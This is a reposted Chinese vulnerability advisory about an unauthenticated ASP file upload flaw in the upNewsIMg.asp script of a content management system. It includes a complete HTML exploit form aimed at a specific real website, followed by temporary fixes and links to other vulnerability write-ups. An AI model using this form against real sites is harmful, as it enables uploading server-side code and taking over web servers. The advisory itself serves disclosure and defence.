大志网站内容管理系统Professional 2.0漏洞

简介:
信息来源: [url]www.neeao.com[/url]

漏洞发现:Neeao
程序名称:大志网站内容管理系统
漏洞版本:Professional 2.0 bulid 20040905 
系统开发:大志工作室 
官方地址:_blank> [url]http://www.wytg.net/[/url]
漏洞说明:上传漏洞

程序说明:是基于ASP开发的一套网络新闻文章管理系统,从首页、类别网页(包括类别分页)一直到文章阅读页面,自动生成
全静态HTML页面!

漏洞描述:其所使用的上传新闻图片文件upNewsIMg.asp,没有对上传文件后缀做判断,导致可以直接上传asp文件。
更重要的是,在这个文件中没有给出权限验证,可以直接利用本文件上传Asp文件!

利用方法:构造一个提交表单即可上传asp文件!如下:
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <html>
<head>
<title>文件上传</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="_blank> [url]http://www.xbgqxx.com/upload/upNewsIMg.asp[/url] " enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>图片上传</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<script language="javascript">
  function setid()
  {
  str='<br>';
  if(!window.form1.upcount.value)
  window.form1.upcount.value=2;
  if(window.form1.upcount.value>100){
  alert("您最多只能同时上传100个文件0");
  window.form1.upcount.value = 100;
  setid();
  }
  else{
  for(i=1;i<=window.form1.upcount.value;i++)
  str+='<div align="left">待传图片'+i+':<input type="file" name="file'+i+'" style="width:200" class="tx1"></div>';
  window.upid.innerHTML=str+'<br>';}
  }
  </script>
上传个数: 
<input type="text" class="tx" value="2" name="upcount" size="20">
<input type="button" name="Button" class="bt" value="· 设定 ·">

</td>
</tr>
<tr align="center" valign="middle">
<td align="left" id="upid" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· 提交 ·" class="bt">
<input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"> </td>
</tr>
</table>
</center>
</div>
</form>

</body>

</html> 


厂商补丁:暂时没有

临时解决方法:
1、在文件upNewsIMg.asp加入:
_code cellSpacing=1 cellPadding=0 width="90%" border=0> <!--#i nclude FILE="../admin/check.asp"--> 

限制一般会员的权限,禁止其使用上传功能。

2、直接删除这个文件!


















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8582 ,如需转载请自行联系原作者


相关文章
|
安全
CNVD-2021-49104——泛微E-Office文件上传漏洞
CNVD-2021-49104——泛微E-Office文件上传漏洞
624 1
CNVD-2021-49104——泛微E-Office文件上传漏洞
|
SQL Web App开发 安全
Discuz历史漏洞分析(一)
Discuz是非常受欢迎的论坛型CMS,但是近年来DZ也爆出了很多经典漏洞,以下分析了几个不同类型的DZ历史漏洞(SQL注入、XSS、任意文件删除、弱加密算法、任意代码执行、HTTP HOST攻击等),提高安全人员的安全意识。
Discuz历史漏洞分析(一)
|
Web App开发 缓存 安全
Discuz历史漏洞分析(三)
Discuz是非常受欢迎的论坛型CMS,但是近年来DZ也爆出了很多经典漏洞,以下分析了几个不同类型的DZ历史漏洞(SQL注入、XSS、任意文件删除、弱加密算法、任意代码执行、HTTP HOST攻击等),提高安全人员的安全意识。
Discuz历史漏洞分析(三)
|
SQL 安全 算法
Discuz历史漏洞分析(二)
Discuz是非常受欢迎的论坛型CMS,但是近年来DZ也爆出了很多经典漏洞,以下分析了几个不同类型的DZ历史漏洞(SQL注入、XSS、任意文件删除、弱加密算法、任意代码执行、HTTP HOST攻击等),提高安全人员的安全意识。
Discuz历史漏洞分析(二)
|
缓存 安全
开源内容管理系统 Joomla CMS 3.9.10发布
Joomla 3.9.10现已推出。这是针对3.x系列Joomla的安全修复程序版本,它解决了一个安全漏洞,包含30多个错误修复和改进。 什么是3.9.10?Joomla 3.9.10包含一个安全漏洞修复程序和一些错误和改进,包括: 安全问题已修复低优先级 - 子窗体字段中的Core - Filter属性允许远程执行代码(影响Joomla 3.
941 0
|
安全
微软公布SharePoint漏洞 可导致应用突然关闭
  5月25日消息,微软昨日公布了SharePoint Server 2007中的一个重大漏洞,安装SP2后,该漏洞会导致SharePoint在180天后过期。     一位SharePoint产品主管表示,该漏洞会将产品视为试验品而错误地重置产品有效期,所有安装了SP2的Office SharePoint Server 2007、Project Server 2007、Form Server 2007、Search Server 2008、Search Server 2008 Express用户都会无法幸免。
1098 0
|
安全 Windows
微软发布三月安全公告 两个补丁修补严重漏洞
微软今日发布了2010年3月的安全公告,虽然数量不多只有两个,但均可以让黑客实现远程代码执行,因此被评级为“重要”。 这两个漏洞分布在Windows Movie Maker和Office Excel中,攻击者只需要制造一些特殊的文件来让用户打开即可使他们中招,微软已经在MS10-016和MS10-017安全公告中描述并修复了这一问题。
810 0
|
Web App开发 安全
微软将发布5月安全漏洞补丁 修补PPT
根据微软在星期四发布的提前声明, 该公司于5月12日星期二发布本月的月度漏洞修复补丁. 这一次,当它提供补丁以及解释安全问题的安全性公告时,微软只有一个补丁被评级为“紧急” 。然而,这并不意味着这个修复补丁可以轻视。
904 0
|
安全 测试技术 PHP
网站漏洞检测与修复之Discuz论坛3.4版本
Discuz!论坛目前最新版本为3.4版本,已经好久没有更新了,我们SINE安全在对其网站安全检测的同时发现一处漏洞,该漏洞可导致论坛的后台文件可以任意的删除,导致网站瘫痪,后台无法登陆。关于该网站漏洞的细节我们来详细的分析看一下: Discuz漏洞的检测与分析 该漏洞发生的位置在于source目录下的admincp文件夹里的admincp_forums.php代码里,我们用note编辑器打开查找到unlink函数调用的地方,就看到漏洞产生的原因了,直接搜索$_get{'replybgnew'],定位到代码。
2216 0

热门文章

最新文章